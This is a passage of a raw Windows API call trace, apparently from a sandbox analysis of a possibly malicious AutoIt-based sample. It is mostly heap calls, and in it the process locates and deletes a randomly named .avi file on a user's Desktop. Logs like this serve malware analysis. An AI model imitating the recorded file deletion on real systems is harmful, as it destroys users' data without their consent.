(in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.662] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.662] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0076.662] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.662] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.662] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.662] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.662] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.662] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi", lpFilePart=0x0) returned 0x3a [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.663] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7zcat1jobb0roi5s.avi")) returned 0x20 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.663] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89da8c90, ftCreationTime.dwHighDateTime=0x1d5dddd, ftLastAccessTime.dwLowDateTime=0xab43cd40, ftLastAccessTime.dwHighDateTime=0x1d5d90c, ftLastWriteTime.dwLowDateTime=0xca661040, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xeb7c, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="7zcAt1JobB0Roi5s.avi", cAlternateFileName="7ZCAT1~1.AVI")) returned 0x6b8b38 [0076.663] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7zcat1jobb0roi5s.avi")) returned 1 [0076.665] FindNextFileW (in: hFindFile=0x6b8b38, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89da8c90, ftCreationTime.dwHighDateTime=0x1d5dddd, ftLastAccessTime.dwLowDateTime=0xab43cd40, ftLastAccessTime.dwHighDateTime=0x1d5d90c, ftLastWriteTime.dwLowDateTime=0xca661040, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xeb7c, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="7zcAt1JobB0Roi5s.avi", cAlternateFileName="7ZCAT1~1.AVI")) returned 0 [0076.665] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0076.665] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0076.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0076.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0076.683] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9c8 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0076.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0076.683] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0076.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0076.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0076.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690960 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0076.684] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b138 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.684] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0076.684] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0076.684] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0076.684] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0076.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0076.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.685] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.686] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0076.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0076.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.687] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0076.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x69d7a8 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0076.688] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.688] HeapFree 